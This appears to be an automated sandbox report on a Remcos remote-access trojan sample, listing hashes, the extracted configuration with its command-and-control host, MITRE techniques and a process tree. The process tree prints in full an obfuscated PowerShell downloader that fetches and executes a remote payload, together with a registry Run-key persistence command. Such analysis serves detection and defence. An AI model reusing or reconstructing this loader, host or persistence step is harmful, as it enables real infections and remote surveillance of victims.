remcos | 18c0a772f0142bc8e5fb0c8931c0ba4c9e680ff97d7ceb8c496f68dea376f9da

General

Target

ZamwienieAgotechBegyndelsesord.cmd
Size

6KB
MD5

3d7da4151a900b78806ab477742d5dac
SHA1

6c1e6242135295dd5fa581f985691e6e83a578c0
SHA256

18c0a772f0142bc8e5fb0c8931c0ba4c9e680ff97d7ceb8c496f68dea376f9da
SHA512

8a1ab4409d25356a3b7f2a491360e4522903a9fde8e8f08a1bb2e2374e69d2a46ece3f928c5048800f55e3000b7cc8011004a9ef1dc9bc6fc816f35fce7ca6b2
SSDEEP

96:TMYZqpZ6iOlYvwLIcwlzQ5yMNPRhA+aNukrQd5QcEzprsQh47ETwC28iD0yc:T/q76iOlKwWINPsj+Zers57ETwC28eVc

Score

10^/10

remcos miss chy discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-TXCR8B
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2584	powershell.exe
5	1392	msiexec.exe
8	1392	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2584	powershell.exe
2896	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\smigenes = "%Pesten% -windowstyle 1 $nonpreventible=(gp -Path 'HKCU:\\Software\\Skydedren\\').Forgaber;%Pesten% ($nonpreventible)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1392	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2896	powershell.exe
1392	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2364	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2584	powershell.exe
2896	powershell.exe
2896	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2896	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2344 wrote to memory of 2584	2344	cmd.exe	30
PID 2344 wrote to memory of 2584	2344	cmd.exe	30
PID 2344 wrote to memory of 2584	2344	cmd.exe	30
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 2896 wrote to memory of 1392	2896	powershell.exe	35
PID 1392 wrote to memory of 2556	1392	msiexec.exe	36
PID 1392 wrote to memory of 2556	1392	msiexec.exe	36
PID 1392 wrote to memory of 2556	1392	msiexec.exe	36
PID 1392 wrote to memory of 2556	1392	msiexec.exe	36
PID 2556 wrote to memory of 2364	2556	cmd.exe	38
PID 2556 wrote to memory of 2364	2556	cmd.exe	38
PID 2556 wrote to memory of 2364	2556	cmd.exe	38
PID 2556 wrote to memory of 2364	2556	cmd.exe	38

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\ZamwienieAgotechBegyndelsesord.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden " <#Pestepidemier Fylogenetiske Nonentreatingly Hemokonia #>;$Anapanapa='Roughnesses';<#Dividant Hexadactylic Heptahydroxy Fanden Lockstep Modstandene Folkeskolens #>;$Reagensets=$Dyreenheds181+$host.UI;function Frstehaandskendskab($Arbejdslshedskasses){If ($Reagensets) {$Necrosing++;}$meshing=$Koppie+$Arbejdslshedskasses.'Length'-$Necrosing; for( $Masses=4;$Masses -lt $meshing;$Masses+=5){$Kolkhosen249++;$Empuzzle+=$Arbejdslshedskasses[$Masses];$Alliteral='tiendedel';}$Empuzzle;}function Trudgeons($Prehensility){ . ($Olynthiac11) ($Prehensility);}$Planar=Frstehaandskendskab 'Tol.M .troLukrzDat iLabilSka.l BttaL.pp/cent ';$Planar+=Frstehaandskendskab 'F rz5Aggl.Non.0Sco, Moso(rallWPoleiSubdnHomed a roArg wArbesBums KloNObedTA gr Hyd1.rec0Gour.Medi0Forg;Adve ClocWudtyiirrinSe t6Hals4Indf;Sham Ateix amp6Leta4 Bas;Mezq Sv jr KnivPiez: gnf1Osie3 Gr 1Ther.P,nd0vedl)Flos i.teGReapeForfcTouckDo.eo Fe /Prog2Conc0pr d1 H a0Anlg0 upe1Alar0Sang1Enev AlunFobseiSin rW ureUn rfHi soPalmxFris/Stru1N na3Rakk1Nst .K yn0 Qui ';$Banting=Frstehaandskendskab 'BoaruU haS SchE.verrKoa,-Mrb,AcinggS,heEHaemNtalitHell ';$Helfabrikaterne=Frstehaandskendskab 'Ho,oh B ttSemit AutpAlensear :.omm/p at/ F.op seulRespiReuce KollOophtBovsdKonv.St,etDopaoOrd pR pr/DixiBChariUndel hasdMi prmre.e HydnLis e Rev.Re.exTurgt ,ripUd v ';$Amimide=Frstehaandskendskab '.hur>regi ';$Olynthiac11=Frstehaandskendskab ',aryiVerse ,rrxKont ';$Arches='Neurosurgeons';$Disconcertedly='\Kirkernes.Tem';Trudgeons (Frstehaandskendskab 'Sst $ov.rGOmgrlDrisO Sk.bpag a F,blNide:TranH ttEFlamRDor o mulnFastiSto tDisaeCong=Ha t$.oorEBe pnM,rcv akt:G npA ngopDetePUndeDAnonaSkemtBearAGrun+.aug$V.ndDAfr,iBoozSSubsc SlhoSmadnU.skcProseKlaurAldrt Ki,E Diad ncolU.reYGene ');Trudgeons (Frstehaandskendskab ' Cen$Inc gP rsLMicroHildB UndAInexL Una:Mimbm.andORestRHookAErodrPredeBredNL mrtLat EJonir Sph=Siwa$FormHV viEOverlForhFRumfAMeecBD plrMaaniDistKCi gaSpaltP agEPungrEmphN B reAftr.Bow SHemapAftoLSkr.iRef.T ac(,tag$s,ifa Fr mPalaiW isMZo sIBo eD OutEDisp)Data ');Trudgeons (Frstehaandskendskab 'Alka[ElleNS fteSupptSkue.CentsSpg e egr ormVPuffiSlvdCHyggE forPRingoSpecIHeman St tSkr.mTi tADactN HovAPa tG NvnEkreerSulp]inco: Non:OverSReadebor cFodguNudiR ieiVanrT bruYSammPU,dvrDrejOUn.atagloO intc raqOFibrlOver ,ae=Sens Tage[Ls rNRemoeSstvt gav. cisSA,geEU,stcVovhUda.rRGo si .actaandYCentP UdprB lyONubiTMy,hOsc bCProdO .isl KogTUndeYCobip,inieanti]Brn :Insi:BrantCalalP emskubi1Pra 2B ts ');$Helfabrikaterne=$Morarenter[0];$Kontroversen=(Frstehaandskendskab ' ron$La.cgCharL FulOSekuB WamaM,silKlyn:IcossskrsPShadi uglD FlonSteri FarnsagsgstreETandRUdseNfemreKoge=ReliNCh ueMelowSpin-OpvaodestBLibsJ ntiEBa,oC uartB ge ProtSBefoYEfteSPresTStylELocrMModr.AnnonSkrmeBangT Pre. arowR goEv,kaBdde.c At,LnoncIMillEDec NStamtMyrm ');Trudgeons ($Kontroversen);Trudgeons (Frstehaandskendskab 'B nd$ RagSAmpopravjiBl,ddPr enLulli GurnRetigAnareAlinr Masn F,reLog..GrooHMa eeWlada TredAnmaeOtosrJukisSice[Spro$GtesBInsia,unsnPorit ambiAryln Pomg.vne],orl= Att$VideP .yel nsa sacnTrigaYderrange ');$Podos=Frstehaandskendskab '.ndo$Hal SSlagp Ao iOblodG smnBurri ootnUdfrgAkkueDui.rAnvin GeneClun. estDA tro It wSc.nnposilBrowoCounainded b cF Impi EgglUr te Bib(Post$ djiHOu teB tllEnerfMonkaSkilb nder PreiSneekB weaA.butRakee S,urCashnult eF ji,Glde$ForvGUnboeK lvmblanmA tie ,pesDisatReeneRo sdS,oveO klrCeren.preeHypnsNati)did, ';$Gemmestedernes=$Heronite;Trudgeons (Frstehaandskendskab '.ilp$Tho gT,edL omsoNighbUnstAStudLS pi:EartARengfCemeLSansaCompaPlaysVenteConsl,tebIAssegProct Gro= u i(UddaTSesse,pfoS Badt Lys-educPOrl ABlidtSpriHMoil s i$ AfsG alie IatM Br.mOmbyePsykSObsctWa le Oved laceLymprBekrnSou eCompSnove)Lyd. ');while (!$Aflaaseligt) {Trudgeons (Frstehaandskendskab 'U.de$LendgTr sl IndorankbWa,fa LitlVerd:sangBTitalExiseOejenJuledUndiemuzzrKoopn HomeSom.sFore=Virg$K.mptPar rcapnuSkame D,a ') ;Trudgeons $Podos;Trudgeons (Frstehaandskendskab ' DisSCounT EksA LykRSikrt.ynt-Ne bs Refls otEVi jE,tfaptoad Ber.4 pi ');Trudgeons (Frstehaandskendskab 'Domi$HemoG.ncoL HanOPredB BlraVa bLB as:Sok APillFBridLS.inaAbidAEmmeSev cE TaiLBegriLacmgskriTSvin=Frit(T.antO phEF ecSMarstPits-Frplp ukkaE petSviph ogs Notu$EluvG BunESynkM BrumTerme Di,SOverTHierEHumrDbirtE Grar A.vnFundeOtt SHjtl)Samf ') ;Trudgeons (Frstehaandskendskab ',egi$ urwg,uxelSyn,o StuBRecoASamml nv:Vi tLOceai lev Ov s.apiFHal,i lagLRonsOFiskSCo,yO Fa,FPateIhist=Diam$Poo.G U rlmo dO GreBGudsaHoveLmuni:AfstHjernjPos hPampeLangdTeakE .djr UnlnUnveEB da1 ar2Crud7a,at+ Fa +Upar%Cze $Cy lM agsOu stRop aA PalR Euce PrenCo cTD mseDer rgenn.N naCE aco BaaUMorgnfri t The ') ;$Helfabrikaterne=$Morarenter[$Livsfilosofi];}$Massesncommunicability=324829;$tordnendes=29974;Trudgeons (Frstehaandskendskab ' rch$ KongacetLStikOD scb ydraPibeLOste:Do bbOverrPro.uTheostache BesdOutreKol, ize= Ko StorgSprneOstetEkst-FootcAu,oo FabN,nstTBlowE anvN emetA.ri sk n$Inthg,oucETllemCampm .piETrioSdataT,lineTangdDispe ForRUnreNAmbie iesA af ');Trudgeons (Frstehaandskendskab 'Estr$Subvg SkalI dfo ykbSaplaModelipid:Voi.FFl,suMonalT knfDistiKre l itlIntemU.ige Docn.illt loe1 Qua0Ve s4Peer Tom = Sim Dona[CockSErmiy H,rsmerstUn.ie ontmZaca.DrmmCRecioLbsknCh cv,agge rchrblamtFilb]Dise:Aars:KommFSylerT.ptoB nem St.B B mako rs Nare gac6sten4SkrmS AfktRearr r mi Pr.nH,ejg Non(Al o$FinsB Cl.r rriuSupesBlooeNatid hece Val) Sq ');Trudgeons (Frstehaandskendskab 'Ephe$.epog.eakl nthONeurbOverADagsLglo :PodoTPra RAntrARaasnAg nsRundpFribOPic.R Ne T MisA ormPZelaRbehv bs=Forv Wizi[DiessPrody Em SVej,tTmtsE St,MAnnu.Matht ndeSme,XUdhoTP ls.Tusce PhoN FricLoonoB utdOppiILo anExclGPoli]Pr p: Gra:TaknA.krasO reCUndeiBlokIMidt. DemGChile V rt U.sSbefiTG nerCya,i amn ArggBacu( nte$P.lyfFam u.mpyLDig.fAnhyiDek.lHemilSabbmTilbEBeh n Votta pr1Kegl0 Fo 4Kean)F je ');Trudgeons (Frstehaandskendskab 'Piet$SydaGFraiL CiroNewsbBe iaBekmLK,nt: nytDGunhINitosKaagm.onmE folaVictsHjlpu AdeRpreaaInkbB rallLigkeOrdi=Equa$SimptFortR uldA ,olNKagesBantPG,noOPr wrSlynt PleaGrunpUv nRChoc.VectSOve U S rBKollSSe iTLathrTilsiTilfNCad GSc a(Vent$ PremsundA R,wSBisaS ConeBat SdespNUnsiCEnmoO,vneM UnpmOptiu MadNe foi.ushCDeluA StoBKodeiFav.LTolkiMansT NabyS un,U vi$ZinctArveo lagr PhrdAf rnLin.ERh,inTastd UdbeSchuSBas )Bute ');Trudgeons $Dismeasurable;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pestepidemier Fylogenetiske Nonentreatingly Hemokonia #>;$Anapanapa='Roughnesses';<#Dividant Hexadactylic Heptahydroxy Fanden Lockstep Modstandene Folkeskolens #>;$Reagensets=$Dyreenheds181+$host.UI;function Frstehaandskendskab($Arbejdslshedskasses){If ($Reagensets) {$Necrosing++;}$meshing=$Koppie+$Arbejdslshedskasses.'Length'-$Necrosing; for( $Masses=4;$Masses -lt $meshing;$Masses+=5){$Kolkhosen249++;$Empuzzle+=$Arbejdslshedskasses[$Masses];$Alliteral='tiendedel';}$Empuzzle;}function Trudgeons($Prehensility){ . ($Olynthiac11) ($Prehensility);}$Planar=Frstehaandskendskab 'Tol.M .troLukrzDat iLabilSka.l BttaL.pp/cent ';$Planar+=Frstehaandskendskab 'F rz5Aggl.Non.0Sco, Moso(rallWPoleiSubdnHomed a roArg wArbesBums KloNObedTA gr Hyd1.rec0Gour.Medi0Forg;Adve ClocWudtyiirrinSe t6Hals4Indf;Sham Ateix amp6Leta4 Bas;Mezq Sv jr KnivPiez: gnf1Osie3 Gr 1Ther.P,nd0vedl)Flos i.teGReapeForfcTouckDo.eo Fe /Prog2Conc0pr d1 H a0Anlg0 upe1Alar0Sang1Enev AlunFobseiSin rW ureUn rfHi soPalmxFris/Stru1N na3Rakk1Nst .K yn0 Qui ';$Banting=Frstehaandskendskab 'BoaruU haS SchE.verrKoa,-Mrb,AcinggS,heEHaemNtalitHell ';$Helfabrikaterne=Frstehaandskendskab 'Ho,oh B ttSemit AutpAlensear :.omm/p at/ F.op seulRespiReuce KollOophtBovsdKonv.St,etDopaoOrd pR pr/DixiBChariUndel hasdMi prmre.e HydnLis e Rev.Re.exTurgt ,ripUd v ';$Amimide=Frstehaandskendskab '.hur>regi ';$Olynthiac11=Frstehaandskendskab ',aryiVerse ,rrxKont ';$Arches='Neurosurgeons';$Disconcertedly='\Kirkernes.Tem';Trudgeons (Frstehaandskendskab 'Sst $ov.rGOmgrlDrisO Sk.bpag a F,blNide:TranH ttEFlamRDor o mulnFastiSto tDisaeCong=Ha t$.oorEBe pnM,rcv akt:G npA ngopDetePUndeDAnonaSkemtBearAGrun+.aug$V.ndDAfr,iBoozSSubsc SlhoSmadnU.skcProseKlaurAldrt Ki,E Diad ncolU.reYGene ');Trudgeons (Frstehaandskendskab ' Cen$Inc gP rsLMicroHildB UndAInexL Una:Mimbm.andORestRHookAErodrPredeBredNL mrtLat EJonir Sph=Siwa$FormHV viEOverlForhFRumfAMeecBD plrMaaniDistKCi gaSpaltP agEPungrEmphN B reAftr.Bow SHemapAftoLSkr.iRef.T ac(,tag$s,ifa Fr mPalaiW isMZo sIBo eD OutEDisp)Data ');Trudgeons (Frstehaandskendskab 'Alka[ElleNS fteSupptSkue.CentsSpg e egr ormVPuffiSlvdCHyggE forPRingoSpecIHeman St tSkr.mTi tADactN HovAPa tG NvnEkreerSulp]inco: Non:OverSReadebor cFodguNudiR ieiVanrT bruYSammPU,dvrDrejOUn.atagloO intc raqOFibrlOver ,ae=Sens Tage[Ls rNRemoeSstvt gav. cisSA,geEU,stcVovhUda.rRGo si .actaandYCentP UdprB lyONubiTMy,hOsc bCProdO .isl KogTUndeYCobip,inieanti]Brn :Insi:BrantCalalP emskubi1Pra 2B ts ');$Helfabrikaterne=$Morarenter[0];$Kontroversen=(Frstehaandskendskab ' ron$La.cgCharL FulOSekuB WamaM,silKlyn:IcossskrsPShadi uglD FlonSteri FarnsagsgstreETandRUdseNfemreKoge=ReliNCh ueMelowSpin-OpvaodestBLibsJ ntiEBa,oC uartB ge ProtSBefoYEfteSPresTStylELocrMModr.AnnonSkrmeBangT Pre. arowR goEv,kaBdde.c At,LnoncIMillEDec NStamtMyrm ');Trudgeons ($Kontroversen);Trudgeons (Frstehaandskendskab 'B nd$ RagSAmpopravjiBl,ddPr enLulli GurnRetigAnareAlinr Masn F,reLog..GrooHMa eeWlada TredAnmaeOtosrJukisSice[Spro$GtesBInsia,unsnPorit ambiAryln Pomg.vne],orl= Att$VideP .yel nsa sacnTrigaYderrange ');$Podos=Frstehaandskendskab '.ndo$Hal SSlagp Ao iOblodG smnBurri ootnUdfrgAkkueDui.rAnvin GeneClun. estDA tro It wSc.nnposilBrowoCounainded b cF Impi EgglUr te Bib(Post$ djiHOu teB tllEnerfMonkaSkilb nder PreiSneekB weaA.butRakee S,urCashnult eF ji,Glde$ForvGUnboeK lvmblanmA tie ,pesDisatReeneRo sdS,oveO klrCeren.preeHypnsNati)did, ';$Gemmestedernes=$Heronite;Trudgeons (Frstehaandskendskab '.ilp$Tho gT,edL omsoNighbUnstAStudLS pi:EartARengfCemeLSansaCompaPlaysVenteConsl,tebIAssegProct Gro= u i(UddaTSesse,pfoS Badt Lys-educPOrl ABlidtSpriHMoil s i$ AfsG alie IatM Br.mOmbyePsykSObsctWa le Oved laceLymprBekrnSou eCompSnove)Lyd. ');while (!$Aflaaseligt) {Trudgeons (Frstehaandskendskab 'U.de$LendgTr sl IndorankbWa,fa LitlVerd:sangBTitalExiseOejenJuledUndiemuzzrKoopn HomeSom.sFore=Virg$K.mptPar rcapnuSkame D,a ') ;Trudgeons $Podos;Trudgeons (Frstehaandskendskab ' DisSCounT EksA LykRSikrt.ynt-Ne bs Refls otEVi jE,tfaptoad Ber.4 pi ');Trudgeons (Frstehaandskendskab 'Domi$HemoG.ncoL HanOPredB BlraVa bLB as:Sok APillFBridLS.inaAbidAEmmeSev cE TaiLBegriLacmgskriTSvin=Frit(T.antO phEF ecSMarstPits-Frplp ukkaE petSviph ogs Notu$EluvG BunESynkM BrumTerme Di,SOverTHierEHumrDbirtE Grar A.vnFundeOtt SHjtl)Samf ') ;Trudgeons (Frstehaandskendskab ',egi$ urwg,uxelSyn,o StuBRecoASamml nv:Vi tLOceai lev Ov s.apiFHal,i lagLRonsOFiskSCo,yO Fa,FPateIhist=Diam$Poo.G U rlmo dO GreBGudsaHoveLmuni:AfstHjernjPos hPampeLangdTeakE .djr UnlnUnveEB da1 ar2Crud7a,at+ Fa +Upar%Cze $Cy lM agsOu stRop aA PalR Euce PrenCo cTD mseDer rgenn.N naCE aco BaaUMorgnfri t The ') ;$Helfabrikaterne=$Morarenter[$Livsfilosofi];}$Massesncommunicability=324829;$tordnendes=29974;Trudgeons (Frstehaandskendskab ' rch$ KongacetLStikOD scb ydraPibeLOste:Do bbOverrPro.uTheostache BesdOutreKol, ize= Ko StorgSprneOstetEkst-FootcAu,oo FabN,nstTBlowE anvN emetA.ri sk n$Inthg,oucETllemCampm .piETrioSdataT,lineTangdDispe ForRUnreNAmbie iesA af ');Trudgeons (Frstehaandskendskab 'Estr$Subvg SkalI dfo ykbSaplaModelipid:Voi.FFl,suMonalT knfDistiKre l itlIntemU.ige Docn.illt loe1 Qua0Ve s4Peer Tom = Sim Dona[CockSErmiy H,rsmerstUn.ie ontmZaca.DrmmCRecioLbsknCh cv,agge rchrblamtFilb]Dise:Aars:KommFSylerT.ptoB nem St.B B mako rs Nare gac6sten4SkrmS AfktRearr r mi Pr.nH,ejg Non(Al o$FinsB Cl.r rriuSupesBlooeNatid hece Val) Sq ');Trudgeons (Frstehaandskendskab 'Ephe$.epog.eakl nthONeurbOverADagsLglo :PodoTPra RAntrARaasnAg nsRundpFribOPic.R Ne T MisA ormPZelaRbehv bs=Forv Wizi[DiessPrody Em SVej,tTmtsE St,MAnnu.Matht ndeSme,XUdhoTP ls.Tusce PhoN FricLoonoB utdOppiILo anExclGPoli]Pr p: Gra:TaknA.krasO reCUndeiBlokIMidt. DemGChile V rt U.sSbefiTG nerCya,i amn ArggBacu( nte$P.lyfFam u.mpyLDig.fAnhyiDek.lHemilSabbmTilbEBeh n Votta pr1Kegl0 Fo 4Kean)F je ');Trudgeons (Frstehaandskendskab 'Piet$SydaGFraiL CiroNewsbBe iaBekmLK,nt: nytDGunhINitosKaagm.onmE folaVictsHjlpu AdeRpreaaInkbB rallLigkeOrdi=Equa$SimptFortR uldA ,olNKagesBantPG,noOPr wrSlynt PleaGrunpUv nRChoc.VectSOve U S rBKollSSe iTLathrTilsiTilfNCad GSc a(Vent$ PremsundA R,wSBisaS ConeBat SdespNUnsiCEnmoO,vneM UnpmOptiu MadNe foi.ushCDeluA StoBKodeiFav.LTolkiMansT NabyS un,U vi$ZinctArveo lagr PhrdAf rnLin.ERh,inTastd UdbeSchuSBas )Bute ');Trudgeons $Dismeasurable;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "smigenes" /t REG_EXPAND_SZ /d "%Pesten% -windowstyle 1 $nonpreventible=(gp -Path 'HKCU:\Software\Skydedren\').Forgaber;%Pesten% ($nonpreventible)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "smigenes" /t REG_EXPAND_SZ /d "%Pesten% -windowstyle 1 $nonpreventible=(gp -Path 'HKCU:\Software\Skydedren\').Forgaber;%Pesten% ($nonpreventible)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Kirkernes.Tem

Filesize
461KB

MD5
c28c799cd656aabecee1bdcb7bf8b54a

SHA1
081d7eafb5c0f7a1b8b18217e25779124523c939

SHA256
8fa0817a784433acb92ccc0189f08b042ea69e12b097bbee35da800b2e7d38e3

SHA512
ab4c035e2e34a2f28bb867fdcfc3e3534798d2934ea1b14f9701341ed0ae7cd600d45503455b840befa61c1cb2adfcb1a0a54ee74a8b4ad12a8c197696857528

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QG4L4Y3TVRSQZ493JM2F.temp

Filesize
7KB

MD5
ff25e9f3c9ac3124e21b1cecaa179687

SHA1
989aad11a43c37f208de12b6a0341b4312758120

SHA256
b07322f378e39568aff81649d91ac2dd03d3ee86ae0380cede475572355cb234

SHA512
837b0e2d24261825156b436abfe3b8fc821a258c1ede90f6abc84d108deaf13a802e23b7e93fb29ea9dcf00584f31b0f7ddf62303042399887d4ed0a7a194f99

Download Submit
memory/1392-40-0x0000000000390000-0x00000000013F2000-memory.dmp

Filesize
16.4MB

Download
memory/1392-37-0x0000000000390000-0x00000000013F2000-memory.dmp

Filesize
16.4MB

Download
memory/2584-8-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-9-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-10-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-11-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-13-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

Filesize
4KB

Download
memory/2584-14-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-16-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-4-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp

Filesize
4KB

Download
memory/2584-7-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp

Filesize
9.6MB

Download
memory/2584-6-0x00000000024F0000-0x00000000024F8000-memory.dmp

Filesize
32KB

Download
memory/2584-5-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/2896-20-0x0000000006250000-0x000000000AA74000-memory.dmp

Filesize
72.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads